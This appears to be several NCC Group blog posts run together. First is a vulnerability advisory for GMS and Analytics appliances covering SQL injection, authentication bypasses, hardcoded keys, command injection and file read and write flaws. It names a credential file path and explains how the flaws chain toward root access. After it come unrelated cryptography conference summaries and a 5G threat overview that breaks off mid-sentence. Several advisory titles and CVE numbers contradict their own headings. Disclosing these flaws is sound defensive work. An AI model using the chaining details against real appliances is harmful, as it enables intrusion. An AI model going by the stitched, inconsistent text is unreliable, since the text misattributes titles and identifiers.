Title: Multiple Unauthenticated SQL Injection Issues Security Filter Bypass
Risk: 9.8 (Critical) - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N
Versions Affected: GMS Virtual Appliance 9.3.2-SP1 and earlier, GMS Windows 9.3.2-SP1 and earlier, Analytics 2.5.0.4-R7 and earlier
CVE Identifier: CVE-2023-34133
Authors: Richard Warren <richard.warren[at]nccgroup.com>, Sean Morland <sean.morland[at]nccgroup.com>
Description
The GMS web application was found to be vulnerable to numerous SQL injection issues. Additionally, security mechanisms that were in place to help prevent against SQL Injection attacks could be bypassed.
Impact
An unauthenticated attacker could exploit these issues to extract sensitive information, such as credentials, reset user passwords, bypass authentication, and compromise the underlying device.
Web Service Authentication Bypass – CVE-2023-34124
Title: Web Service Authentication Bypass
Risk: 9.4 (Critical) - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:H
Versions Affected: GMS Virtual Appliance 9.3.2-SP1 and earlier, GMS Windows 9.3.2-SP1 and earlier, Analytics 2.5.0.4-R7 and earlier
CVE Identifier: CVE-2023-34124
Authors: Richard Warren <richard.warren[at]nccgroup.com>, Sean Morland <sean.morland[at]nccgroup.com>
Description
The authentication mechanism used by the Web Services application did not adequately perform authentication checks, as no secret information was required to perform authentication.
The authentication mechanism employed by the GMS /ws application used a non-secret value when performing HTTP digest authentication. An attacker could easily supply this information, allowing them to gain unauthorised access to the application and call arbitrary Web Service methods.
Impact
An attacker with knowledge of authentication mechanism would be able to generate valid authentication codes for the GMS Web Services application, and subsequently call arbitrary methods. A number of these Web Service methods were found to be vulnerable to additional issues, such as arbitrary file read and write (see CVE-2023-34135, CVE-2023-34129 and CVE-2023-34134). Therefore, this issue could lead to the complete compromise of the host.
Predictable Password Reset Key – CVE-2023-34123
Title: Password Hash Read via Web Service
Risk: 7.5 (High) - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
Versions Affected: GMS Virtual Appliance 9.3.2-SP1 and earlier, GMS Windows 9.3.2-SP1 and earlier, Analytics 2.5.0.4-R7 and earlier
CVE Identifier: CVE-2023-34123
Authors: Richard Warren <richard.warren[at]nccgroup.com>, Sean Morland <sean.morland[at]nccgroup.com>
Description
The GMS /appliance application uses a hardcoded key value to generate password reset keys. This hardcoded value does not change between installs. Furthermore, additional information used during password reset code calculation is non-secret and can be discovered from an unauthenticated perspective.
An attacker with knowledge of this information could generate their own password reset key to reset the administrator account password. Note that this issue is only exploitable in certain configurations. Specifically, if the device is registered, or if it is configured in “Closed Network” mode.
Impact
An attacker with knowledge of the hardcoded 3DES key used to validate password reset codes could generate their own password reset code to gain unauthorised, administrative access to the appliance. An attacker with unauthorised, administrative access to the appliance could exploit additional post-authentication vulnerabilities to achieve Remote Code Execution on the underlying device. Additionally, they could gain access to other devices managed by the GMS appliance.
CAS Authentication Bypass – CVE-2023-34137
Title: CAS Authentication Bypass
Risk: 9.4 (Critical) - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:H
Versions Affected: GMS Virtual Appliance 9.3.2-SP1 and earlier, GMS Windows 9.3.2-SP1 and earlier, Analytics 2.5.0.4-R7 and earlier
CVE Identifier: CVE-2023-34137
Authors: Richard Warren <richard.warren[at]nccgroup.com>, Sean Morland <sean.morland[at]nccgroup.com>
Description
The authentication mechanism used by the CAS Web Service (exposed via /ws/cas) did not adequately perform authentication checks, as it used a hardcoded secret value to perform cryptographic authentication checks. The CAS Web Service validated authentication tokens by calculating the HMAC SHA-1 of the supplied username. However, the HMAC secret was static. As such, an attacker could calculate their own authentication tokens, allowing them to gain unauthorised access to the CAS Web Service.
Impact
An attacker with access to the application source code (for example, by downloading a trial VM), could discover the static value used for calculating HMACs – allowing them to generate their own authentication tokens. An attacker with the ability to generate their own authentication tokens would be able to make legitimate use of the CAS API, as well as exploit further vulnerabilities within this API; for example, SQL Injection – resulting in complete compromise of the underlying host.
Title: Post-Authenticated Command Injection
Risk: 8.8 (High) - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Versions Affected: GMS Virtual Appliance 9.3.2-SP1 and earlier, GMS Windows 9.3.2-SP1 and earlier, Analytics 2.5.0.4-R7 and earlier
CVE Identifier: CVE-2023-34127
Authors: Richard Warren <richard.warren[at]nccgroup.com>, Sean Morland <sean.morland[at]nccgroup.com>
Description
The GMS application was found to lack sanitization of user-supplied parameters when allowing users to search for log files on the system. This could allow an authenticated attacker to execute arbitrary code with root privileges.
Impact
An authenticated, administrative user can execute code as root on the underlying file system. For example, they could use this vulnerability to write a malicious cron job, web-shell, or stage a remote C2 payload. Note that whilst on its own this issue requires authentication, there were other issues identified (such as CVE-2023-34123) that could be chained with this vulnerability to exploit it from an initially unauthenticated perspective.
Password Hash Read via Web Service – CVE-2023-34134
Title: Password Hash Read via Web Service
Risk: 9.8 (Critical) - CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
Versions Affected: GMS Virtual Appliance 9.3.2-SP1 and earlier, GMS Windows 9.3.2-SP1 and earlier, Analytics 2.5.0.4-R7 and earlier
CVE Identifier: CVE-2023-34134
Authors: Richard Warren <richard.warren[at]nccgroup.com>, Sean Morland <sean.morland[at]nccgroup.com>
Description
An authenticated attacker can read the administrator password hash via a web service call.
Note that whilst this issue requires authentication, it can be chained with an authentication bypass to exploit the issue from an unauthenticated perspective.
Impact
This issue can be chained with CVE-2023-34124 to read the administrator password hash from an unauthenticated perspective. Following this, an attacker could launch further post-authentication attackers to achieve Remote Code Execution.
Title: Post-Authenticated Arbitrary File Read via Backup File Directory Traversal
Risk: 6.5 (Medium) - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
Versions Affected: GMS Virtual Appliance 9.3.2-SP1 and earlier, GMS Windows 9.3.2-SP1 and earlier, Analytics 2.5.0.4-R7 and earlier
CVE Identifier: CVE-2023-34125
Authors: Richard Warren <richard.warren[at]nccgroup.com>, Sean Morland <sean.morland[at]nccgroup.com>
Description
The GMS application was found to lack sanitization of user-supplied parameters when downloading backup files. This could allow an authenticated attacker to read arbitrary files from the underlying filesystem with root privileges.
Impact
An authenticated, administrative user can read any file on the underlying file system. For example, they could read the password database to retrieve user-passwords hashes, or other sensitive information. Note that whilst on its own this issue requires authentication, there were other issues identified (such as CVE-2023-34123) that could be chained with this vulnerability to exploit it from an initially unauthenticated perspective.
Title: Post-Authenticated Arbitrary File Upload
Risk: 7.1 (High) - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N
Versions Affected: GMS Virtual Appliance 9.3.2-SP1 and earlier, GMS Windows 9.3.2-SP1 and earlier, Analytics 2.5.0.4-R7 and earlier
CVE Identifier: CVE-2023-34126
Authors: Richard Warren <richard.warren[at]nccgroup.com>, Sean Morland <sean.morland[at]nccgroup.com>
Description
The GMS application was found to lack sanitization of user-supplied parameters when allowing users to upload files to the system. This could allow an authenticated upload files anywhere on the system with root privileges.
Impact
An authenticated, administrative user can upload files as root on the underlying file system. For example, they could use this vulnerability to upload a web-shell. Note that whilst on its own this issue requires authentication, there were other issues identified (such as CVE-2023-34124) that could be chained with this vulnerability to exploit it from an initially unauthenticated perspective.
Post-Authenticated Arbitrary File Write via Web Service (Zip Slip) – CVE-2023-34129
Title: Post-Authenticated Arbitrary File Write via Web Service (Zip Slip)
Risk: 7.1 (High) - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N
Versions Affected: GMS Virtual Appliance 9.3.2-SP1 and earlier, GMS Windows 9.3.2-SP1 and earlier, Analytics 2.5.0.4-R7 and earlier
CVE Identifier: CVE-2023-34126
Authors: Richard Warren <richard.warren[at]nccgroup.com>, Sean Morland <sean.morland[at]nccgroup.com>
Description
A web service endpoint was found to be vulnerable to directory traversal whilst extracting a malicious ZIP file (a.k.a. ZipSlip). This could be exploited to write arbitrary files to any location on disk.
Impact
An authenticated attacker may be able to exploit this issue to write arbitrary files to any location on the underlying file system. These files would be written with root privileges. By writing arbitrary files, an attacker could achieve Remote Code Execution. Whilst this issue requires authentication, it could be chained with other issues, such as CVE-2023-34124 (Web Service Authentication Bypass), to exploit it from an initially unauthenticated perspective.
Post-Authenticated Arbitrary File Read via Web Service – CVE-2023-34135
Title: Post-Authenticated Arbitrary File Read via Web Service
Risk: 6.5 (Medium) - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
Versions Affected: GMS Virtual Appliance 9.3.2-SP1 and earlier, GMS Windows 9.3.2-SP1 and earlier, Analytics 2.5.0.4-R7 and earlier
CVE Identifier: CVE-2023-34135
Authors: Richard Warren <richard.warren[at]nccgroup.com>, Sean Morland <sean.morland[at]nccgroup.com>
Description
A web service method allows an authenticated user to read arbitrary files from the underlying file system.
Impact
A remote attacker can read arbitrary files from the underlying file system with the privileges of the Tomcat server (root). When combined with CVE-2023-34124, this issue can allow an unauthenticated attacker to download any file of their choosing. For example, reading the /opt/GMSVP/data/auth.txt file to retrieve the administrator’s password hash.
Client-Side Hashing Function Allows Pass-the-Hash – CVE-2023-34132
Title: CAS Authentication Bypass
Risk: 4.9 (Medium) - CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
Versions Affected: GMS Virtual Appliance 9.3.2-SP1 and earlier, GMS Windows 9.3.2-SP1 and earlier, Analytics 2.5.0.4-R7 and earlier
CVE Identifier: CVE-2023-34132
Authors: Richard Warren <richard.warren[at]nccgroup.com>, Sean Morland <sean.morland[at]nccgroup.com>
Description
The client-side hashing algorithm used during the logon was found to enable pass-the-hash attacks. As such, an attacker with knowledge of a user’s password hash could log in to the application without knowledge of the underlying plain-text password.
Impact
An attacker who is in possession of a user’s hashed password would be able to log in to the application without knowledge of the underlying plain-text password. By exploiting an issue such as CVE-2023-34134 (Password Hash Read via Web Service), an attacker could first read the user’s password hash, and then log in using that password hash, without ever having to know the underlying plain-text password.
Title: Hardcoded Tomcat Credentials (Privilege Escalation)
Risk: 6.5 (Medium) - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N
Versions Affected: GMS Virtual Appliance 9.3.2-SP1 and earlier, GMS Windows 9.3.2-SP1 and earlier, Analytics 2.5.0.4-R7 and earlier
CVE Identifier: CVE-2023-34128
Authors: Richard Warren <richard.warren[at]nccgroup.com>, Sean Morland <sean.morland[at]nccgroup.com>
Description
A number of plain-text credentials were found to be hardcoded both within the application source code and within the users.xml configuration file on the GMS appliance. These credentials did not change between installs and were found to be static. Therefore, an attacker who can decompile the application source code would easily be able to discover these credentials.
Impact
An attacker with access to the Tomcat manager application (via https://localhost/) would be able to utilise the appuser account credentials to gain code execution as the root user, by deploying a malicious WAR file. As the Tomcat manager application is only exposed to localhost by default, an attacker would require an SSRF vulnerability, or the ability to tunnel traffic to the Tomcat Manager port (through SOCKS over SSH, for example). However, this could also be exploited as local privilege escalation vector in the case where an attacker has gained low privileged access to the OS (e.g., via the postgres user or snwlcli users).
Unauthenticated File Upload – CVE-2023-34136
Title: Unauthenticated File Upload
Risk: 5.3 (Medium) - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L
Versions Affected: GMS Virtual Appliance 9.3.2-SP1 and earlier, GMS Windows 9.3.2-SP1 and earlier, Analytics 2.5.0.4-R7 and earlier
CVE Identifier: CVE-2023-34136
Authors: Richard Warren <richard.warren[at]nccgroup.com>, Sean Morland <sean.morland[at]nccgroup.com>
Description
An unauthenticated user can upload an arbitrary file to a location not controlled by the attacker.
Impact
Whilst the location of the upload is not controllable by the attacker this vulnerability can be used in conjunction with other vulnerabilities, such as CVE-2023-34127 (Command Injection), to allow an attacker to upload a web-shell as the root user.
Additionally, there are several functions within the GMS application which execute .sh or .bat files from the Tomcat Temp directory. An attacker could upload a malicious script file which might later be executed by the GMS (during a firmware update, for example).
Unauthenticated Sensitive Information Leak – CVE-2023-34131
Title: Unauthenticated Sensitive Information Leak
Risk: 7.5 (High) - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
Versions Affected: GMS Virtual Appliance 9.3.2-SP1 and earlier, GMS Windows 9.3.2-SP1 and earlier, Analytics 2.5.0.4-R7 and earlier
CVE Identifier: CVE-2023-34131
Authors: Richard Warren <richard.warren[at]nccgroup.com>, Sean Morland <sean.morland[at]nccgroup.com>
Description
A number of pages were found to not require any form of authentication, which could allow an attacker to glean sensitive information about the device, such as serial numbers, internal IP addresses and host-names – which could be later used by an attacker as a prerequisite for further attacks.
Impact
An attacker could leak sensitive information such as the device serial number, which could be later used to inform further attacks. As an example, the serial number is required to exploit CVE-2023-34123 (Predictable Password Reset Key). An attacker can easily glean this information by making a simple request to the device, thus decreasing the complexity of such attacks.
Use of Outdated Cryptographic Algorithm with Hardcoded Key – CVE-2023-34130
Title: Unauthenticated Sensitive Information Leak
Risk: 5.3 (Medium) - CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N
Versions Affected: GMS Virtual Appliance 9.3.2-SP1 and earlier, GMS Windows 9.3.2-SP1 and earlier, Analytics 2.5.0.4-R7 and earlier
CVE Identifier: CVE-2023-34130
Authors: Richard Warren <richard.warren[at]nccgroup.com>, Sean Morland <sean.morland[at]nccgroup.com>
Description
The GMS application was found make use of a customised version of the Tiny Encryption Algorithm (TEA) to encrypt sensitive data. TEA is a legacy block-cipher which suffers from known weaknesses. It’s usage is discouraged in favour of AES, which provides enhanced security, is widely supported, and is included in most standard libraries (e.g. javax.crypto).
Additionally, the encryption key used by the application was found to be hardcoded within the application source code. This means that regardless of any known weakness in the encryption algorithm, or the method used to encrypt the data, an attacker with access to the source code will be able to decrypt any data encrypted with this key.
Impact
An attacker with access to the source code (for example, by downloading a trial VM), could easily retrieve the hardcoded TEA key. Using this key, the attacker could decrypt sensitive information hardcoded within the web application source code, which could aid in compromising the device.
Furthermore, by combining this issue with various other issues (such as authentication bypass and arbitrary file read), an attacker could retrieve and decrypt configuration files containing user passwords. This would ultimately allow an attacker to compromise both the application and underlying Operating System.
About NCC Group
NCC Group is a global expert in cybersecurity and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape. With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate respond to the risks they face. We are passionate about making the Internet safer and revolutionizing the way in which organizations think about cybersecurity.
A specter is haunting Europe – the specter of platform interoperability. The EU signed the Digital Market Acts (DMA) into law in September of last year, mandating chat platforms provide support for interoperable communications. This requirement will be in effect by March of 2024, an aggressive timeline requiring fast action from cryptographic (and regular) engineers. There are advantages to interoperability. It allows users to communicate with their friends and family across platforms, and it allows developers to build applications that work across platforms. There is the potential for this to partially mitigate the network effects associated with platform lock-in, which could lead to more competition and greater freedom of choice for end users. However, interoperability requires shared standards, and standards tend to imply compromise. This is a particularly severe challenge with secure chat apps which aim to provide their users with high levels of security. Introducing hastily designed, legislatively mandated components into these systems is a high-risk change which, in the worst case, could introduce weaknesses which, if introduced, would be difficult to fix (due to the effects of lock-in and the corresponding level of coordination and engineering effort required). This is further complicated by the heterogeneity of the field in regard to end-to-end encrypted chat: E2EE protocols vary by ciphersuite, level and form of authentication, personal identifier (email, phone number, username/password, etc.), and more. Any standardized design for interoperability would need to be able to manage all this complexity. This presentation on work by Ghosh, Grubbs, Len, and Rösler discussed one effort at introducing such a standard for interoperability between E2EE chat apps, focused on extending existing components of widely used E2EE apps. This is appropriate as these apps are most likely to be identified as “gatekeeper” apps to which the upcoming regulations apply in force. The proposed solution uses server-to-server interoperability, in which each end user is only required to directly communicate with their own messaging provider. Three main components of messaging affected by the DMA are identified: identity systems, E2EE protocols, and abuse prevention.
For the first of these items, a system for running encrypted queries to remote providers’ identity systems is proposed; this allows user identities to be associated with keys in such a way that the actual identity data is abstracted and thus could be an email, a phone number, or an arbitrary string.
For the second issue, E2EE encryption, a number of simple solutions are considered and rejected; the final proposal has several parts. Sender-anonymous wrappers are proposed, using a variant of the Secure Sender protocol from Signal, to hide sender metadata; for encryption in transit, non-gatekeeper apps can use an encapsulated implementation of a gatekeeper app’s E2EE through a client bridge. This provides both confidentiality and authenticity, while minimizing metadata leakage.
For the third issue, abuse prevention, a number of options (including “doing nothing” are again considered and rejected). The final design is somewhat nonobvious, and consists of server-side spam filtering, user reporting (via asymmetric message franking, one of the more cryptographically fresh and interesting parts of the system), and blocklisting (which requires a small data leakage, in that the initiator would need to share the blocked party’s user ID with their own server).
Several open problems were also identified (these points are quoted directly from the slides):
How do we improve the privacy of interoperable E2EE by reducing metadata leakage?
How do we extend other protocols used in E2EE messaging, like key transparency, into the interoperability setting?
How do we extend our framework and analyses to group chats and encrypted calls?
This is important and timely work on a topic which has the potential to result in big wins for user privacy and user experience; however, this best-case scenario will only play out if players in industry and academia can keep pace with the timeline set by the DMA. This requires quick work to design, implement, and review these protocols, and we look forward to seeing how these systems take shape in the months to come.
– Eli Sohl
Threshold ECDSA Towards Deployment
A Threshold Signature Scheme (TSS) allows any sufficiently large subset of signers to cryptographically sign a message. There has been a flurry of research in this area in the last 10 years, driven partly by financial institutions’ needs to secure crypto wallets and partly by academic interest in the area from the Multiparty Computation (MPC) perspective. Some signature schemes are more amenable to “thresholding” than others. For example, due to linearity features of “classical” Schnorr signatures, Schnorr is more amenable to “thresholding” than ECDSA (see the FROST protocol in this context). As for thresholding ECDSA, there are tradeoffs as well; if one allows using cryptosystems such as Pallier’s, the overall protocol complexity drops, but speed and extraneous security model assumptions appear to suffer. The DKLS papers, listed below, aim for competitive speeds and minimizing necessary security assumptions:
DKLS18: “Secure Two-party Threshold ECDSA from ECDSA Assumptions”, Jack Doerner, Yashvanth Kondi, Eysa Lee, abhi shelat
DKLS19: “Secure Multi-party Threshold ECDSA from ECDSA Assumptions”, Jack Doerner, Yashvanth Kondi, Eysa Lee, abhi shelat
The first paper proposes a 2-out-of-n ECDSA scheme, whereas the second paper extends it to the t-out-of-n case. The DKLS 2-party multiplication algorithm is based on Oblivious Transfer (OT) together with a number of optimization techniques. The OT is batched, then further sped up by an OT Extension (a way to reduce a large number of OTs to a smaller number of OTs using symmetric key cryptography) and finally used to multiply in a threshold manner. An optimized variant of this multiplication algorithm is used in DKLS19 as well. The talk aimed to share the challenges that occur in practical development and deployments of the DKLS19 scheme, including:
The final protocol essentially requires three messages, however, the authors found they could pipeline the messages when signing multiple messages.
Key refreshing can be done efficiently, where refreshing means replacing the shares and leaving the actual key unchanged.
Round complexity was reduced to a 5-round protocol, reducing the time cost especially over WAN.
One bug identified by Roy in OT extensions did not turn out to apply for the DKLS implementations, however, the authors are still taking precautions and moving to SoftSpoken OT.
An error handling mistake was found in the implementation by Riva where an OT failure error was not propagated to the top.
A number of bug bounties around the improper use of the Fiat-Shamir transform were seen recently. If the protocol needs a programmable Random Oracle, every (sub) protocol instance needs a different Random Oracle, which can be done using unique hash prefixes.
The talk also discussed other gaps between theory and practice: establishing sessions, e.g., whether O(n2) QR code scans required to set up the participant set.
– Aleksandar Kircanski
The Path to Real World FHE: Navigating the Ciphertext Space
Shruthi Gorantala from Google presented The Path to Real World FHE: Navigating the Ciphertext Space. There was also an FHE workshop prior to RWC where a number of advances in the field were presented. Fully Homomorphic Encryption (FHE) allows functions to be executed directly on ciphertext that ends up with the same encrypted results if the functions were run on plaintext. This would result in a major shift in the relationship between data privacy and data processing as previously an application would need to decrypt the data first. Therefore, FHE removes the need for the decryption and re-encryption steps. This would help preserve end-to-end privacy and allow users to have additional guarantees such as cloud providers not having access to user’s data. However, performance is a major concern as performing computations on encrypted data using FHE still remains significantly slower than performing computations on the plaintext. Key challenges for FHE include:
Data size expansion,
Speed, and
Usability.
The focus of the presentation was on presenting a model of FHE hierarchy of needs that included both deficiency and growth needs. FHE deficiency needs are the following:
FHE Instruction Set which focuses on data manipulation and ciphertext maintenance.
FHE Compilers and Transpilers which focuses on parameter selection, optimizers and schedulers.
FHE Application Development which focuses on development speed, debugging and interoperability.
The next phase would be FHE growth needs:
FHE Systems Integration and Privacy Engineering which includes threat modeling.
FHE used a critical component of privacy enhancing technologies (PETs).
A key current goal for FHE is reduce the computational overhead for an entire application to demonstrate FHE’s usefulness in practical real-world settings.
– Javed Samuel
High-Assurance Go Cryptography in Practice
Filippo Valsorda, the maintainer of the cryptographic code in the Go language since 2018, presented the principles at work behind that maintenance effort. The title above is from the RWC program, but the first presentation slide contained an updated title which might be clearer: “Go cryptography without bugs”. Indeed, the core principle of it is that Filippo has a well-defined notion of what he is trying to achieve, that he expressed in slightly more words as follows: “secure, safe, practical, modern, in this order”. This talk was all about very boring cryptography, with no complex mathematics; at most, some signatures or key exchanges, like we already did in the 1990s. But such operations are what actually gets used by applications most of the time, and it is of a great practical importance that these primitives operate correctly, and that common applications do not misuse them through a difficult API. The talk went over these principles in a bit more details, specifically about:
Memory safety: use of a programming language that at least ensures that buffer overflows and use-after-free conditions cannot happen (e.g., Go itself, or Rust).
Tests: many test vectors, to try to exercise edge cases and other tricky conditions. In particular, negative test vectors are important, i.e., verifying that invalid data is properly detected and rejected (many test vector frameworks are only functional and check that the implementation runs correctly under normal conditions, but this is cryptography and in cryptography there is an attacker who is intent on making the conditions very abnormal).
Fuzzing: more tests designed by the computer trying to find unforeseen edge cases. Fuzzing helps because handcrafted negative test vectors can only check for edge conditions that the developer thought about; the really dangerous ones are the cases that the developer did not think about, and fuzzing can find some of them.
Safe APIs: APIs should be hard to misuse and should hide all details that are not needed. For instance, when dealing with elliptic curves, points and scalars and signatures should be just arrays of bytes; it is not useful for applications to see modular integers and finite field elements and point coordinates. Sometimes it is, when building new primitives with more complex properties; but for 95% of applications (at least), using a low-level mathematics-heavy API is just more ways to get things wrongs.
Code generation: for some tasks, the computer is better at writing code than the human. Main example here is implementation of finite fields, in particular integers modulo a big prime; much sorrow has ensued from ill-controlled propagation of carries. The fiat-crypto project automatically generates proven correct (and efficient) code for that and Go uses said code.
Low complexity: things should be simple. The more functions an API offers, the higher the probability that an application calls the wrong one. Old APIs and primitives, that should normally no longer be used in practice, are deprecated; not fully removed, because backward compatibility with existing source code is an important feature, but still duly marked as improper to use unless a very good reason to do so is offered. Who needs to use plain DSA signatures or the XTEA block cipher nowadays? Some people do! But most are better off not trying.
Readability: everything should be easy to read. Complex operations should be broken down into simpler components. Readability is what makes it possible to do all of the above. If code is unreadable, it might be correct, but you cannot know it (and usually it means that it is not correct in some specific ways, and you won’t know it, but some attacker might).
An important point here is that performance is not a paramount goal. In “secure, safe, practical, modern”, the word “fast” does not appear. Cryptographic implementations have to be somewhat efficient, because “practical” implies it (if an implementation is too slow, to the point that it is unusable, then it is not practical), but the quest for saving a few extra clock cycles is pointless for most applications. It does not matter whether you can do 10,000 or 20,000 Ed25519 signatures per second on your Web server! Even if that server is very busy, you’ll need at most a couple dozen per second. Extreme optimization of code is an intellectually interesting challenge, and in some very specialized applications it might even matter (especially in small embedded systems with severe operational constraints), but in most applications that you could conceivably develop in Go and run on large computers, safety and practicality are the important features, not speed of an isolated cryptographic primitive.
– Thomas Pornin
Real World Cryptography 2024
NCC Group’s Cryptography Services team boasts a strong Canadian contingent, so we were excited to learn that RWC 2024 will take place in Toronto, Canada on March 25–27, 2024. We look forward to catching up with everyone next year!
To ensure security of new 5G telecom networks, NCC Group has been providing guidance, conducting code reviews, red team engagements and pentesting 5G standalone and non-standalone networks since 2019. As with any network various attackers are motivated by different reasons. An attacker could be motivated to either gain information about subscribers on an operator’s network by targeting signalling, accessing the customers private data such as billing records, taking control over the management network or taking down the network. In most cases, the main avenue of attack is via the management layer into the core network – either utilising the operator’s support personnel or via the 3rd party vendor. In all cases attacking a 5G network will take a number of weeks or months, with the main group of attackers being Advanced Persistent Threat (APT) groups. Many governments around the world including the UK government are legislating and demanding operators and vendors reduce telecoms security gaps to ensure a resilient 5G network.
But many operators are unclear on the typical threats and how they could affect their business or if they do at all. Many companies are understandably investing significant time and effort into testing and reviewing threats to make sure they adhere to the compliance requirements.
Here, we aim to cover some of the main issues we have discovered during our pentesting and consultancy engagements with clients and explain not only what they are but how likely the threat is to disrupt the 5G network.
Background
Any typical 5G network deployment be it a Non Standalone (NSA) or Standalone (SA) core, can have various security threats or risks associated with it. These threats can be exploited by either known (i.e. default credentials) or unknown vulnerabilities (i.e. zero day). Primarily the main focus of any attack is via the existing core management network, be it via a malicious insider or an attacker who has leveraged access to a suitably high level administrator account or utilising default credentials. We have seen this first hand with red teaming attacks against various operators. Secondary attack vectors are via insecure remote sites hosting RAN infrastructure, which in turn allow access to the core network utilising the management network. Various mechanisms (i.e. firewalls, IDS etc) are put in place to manage these risks but vulnerable networks and systems have to be tested thoroughly to limit attacks. Having a good understanding of the 5G network topology and associated risks/threats is key and NCC Group has the necessary experience and knowledge to scope and deliver this testing.
Typical perceived threats and severity if compromised are illustrated below. The high risk vector is via the corporate and vendor estate, medium risk vectors via the external internet and rogue operators and low risk vector via the RAN edge nodes. This factors in ease of access plus the degree of severity should an attacker leverage access. For example, if an attacker was to gain access to the corporate network and suitable credentials to access the cloud network equipment running the 5G network, that would have a high level impact if a DoS attack was conducted. This is opposed to an attacker leveraging access to a RAN edge node to conduct a DoS attack, where the exposed risks would be limited to the cell site in question.
“Attack scenarios against a typical 4G/5G mobile network”
So a bit of background on 5G. A 5G NSA network consists of a 5G OpenRAN deployment or a gNodeB utilising a 4G LTE core. A 5G StandAlone (SA) network consists of a 5G RAN (Radio Access Network) plus a 5G core only. Within an NSA deployment, a secondary 5G carrier is provided in addition to the primary 4G carrier. A 5G NSA user equipment (UE) device connects first to the 4G carrier before also connecting to the secondary 5G carrier. The 4G anchor carrier is used for control plane signalling while the 5G carrier is used for high-speed data plane traffic. This approach has been used for the majority of commercial 5G network deployments to date. It provides improved data rates while leveraging existing 4G infrastructure. The main benefits of 5G NSA are an operator can build out a 5G network on top of their existing 4G infrastructure instead of investing in a new, costly 5G core, the NSA network uses 4G infrastructure which operators are already familiar with and deployment of a 5G network can be quicker by using the existing infrastructure. A 5G SA network helps reduce latency, improves network performance and has centrally controlling network management functions. The 5G SA can deliver new essential 5G services such as network slicing, allowing multiple tenants or networks to exist separate from each other on the same physical infrastructure. While services like smart meters require security, low power and high reliability are more forgiving with respect to latency, others like driver-less cars may need ultra-low latency (URLLC) and high data speeds. Network slicing in 5G supports these diverse services and facilitates the efficient reassignment of resources from one virtual network slice to another. However, the main disadvantage of implementing a 5G SA network is the cost to implement and training of staff to learn and configure correctly all parts of the new 5G SA core infrastructure.
A OpenRAN network allows deployment of a Radio Access Network (RAN) with vendor neutral hardware or software. The interfaces linking components use open interface specifications between the components (eg RU/DU/CU) plus with different architecture options. A Radio Unit (RU) is used to handle the radio link and antenna connectivity, a Distributed unit (DU) is used to handle the baseband protocols and interconnections to the Centralised Unit (CU). The architecture options include RAN with just Radio Units (RU) and Base Band units (BBU), or split between RU,DU,CU. Normally the Radio Unit is a physical amplifier device connected over a fibre or coaxial link to a DU component that is normally virtualised. A CU component is normally located back in a secure datacentre or exchange and provides the eNodeB/gNodeB connectivity into the core. In most engagements we have seen the use of Kubernetes running DU/CU pods as docker containers on primarily Dell hardware, with a software defined network layer linking into the 5G core.
In 5G a user identity (i.e. IMSI) is never sent over the air in the clear. On the RAN/edge datacentre the control and user planes are encrypted over air and on the wire (i.e. IPSEC), with 5G core utilising encrypted and authenticated signalling traffic. The 5G network components have externally and internally exposed HTTP2 Service Based Interface (SBI) APIs and provide access directly to the 5G core components for management, logging and monitoring. Usually the SBI interface is secured using TLS client and server certificates. The network can now support different tenants by implementing network slices, with the Software Defined Networking (SDN) layer isolating network domains for different users.
So what are the main security threats?
Shown below is a high level overview of a 5G network with a summary of threats. A radio unit front end containing the gNodeB (i.e. basestation) handles interconnects to the user equipment (UE). A RU/DU/CU together form the gNodeB. The midhaul (i.e. Distributed Unit) handles the baseband layer to the RU over the fronthaul to the midhaul Centralised Unit (CU). The DU does not have any access to customer communications as it may be deployed in unsupervised sites. The CU and Non-3GPP Inter Working Function (N3IWF), which terminates the Access Stratum (AS) security, will be deployed in sites with more restricted access. The DU and CU components can be collocated or separate, usually running as virtualised components within a cluster on standard servers. To support low latency applications, Multi-Access Edge computing (MEC) servers are now being developed to reduce network congestion and application latency to users by pushing the computing resources, including storage, to the edge of the network collocating them with the front RF equipment. The MEC offers application developers and content providers cloud computing capabilities and an IT service environment at the edge of the external data network to provide processing capacity for high demand streaming applications like virtual reality games as well as low latency processing for driverless cars. All links are connected over Nx links. The main threats against the DU/CU/MEC components are physical attacks against the infrastructure either to cause damage (ie arson) or to compromise the operating system to glean information about users on the RAN signalling plane. In some cases, attacking the core via these components by compromising management platforms is also possible. Targeting the MEC by a poorly configured CI/CD pipeline and the ingest of malicious code could also be a threat.
The N1/N2 link carrying the NAS protocol provides mobility management and session management between the User equipment (UE) and Access and Mobility Management Function (AMF). It is carried over the RRC protocol to/from the UE. A User Plane Function (UPF) is used as a router of user data connections. The Core Network consists of an AMF, a gateway to the core network, which talks to the AUSF/UDM to authenticate the handset with the network, plus the network also authenticates using a public key with the handset. In the core network all components including a lot of legacy 4G components are now virtualised, running as Kubernetes pods, with worker nodes running on either custom cloud environment or an opensource instance like Openstack. Targeting the 5G NFVI or mobile core cloud via the corporate access is a likely attack vector, either disrupting the service by a DoS attack or acquiring billing data. Similar signalling attacks as in 4G are now prevalent in 5G, due to the same 4G components and associated protocols (ie. SS7, DIAMETER, GTP) being collocated with 5G components, utilising the legacy 4G network to provide service for the 5G network. Within 5G, HTTP/2 SBI interfaces are now in use between the core components (ie AMF/UPF etc), however due to no or poor encryption it is still possible to either view this traffic or query APIs directly. The diagram below illustrates the various threats against a 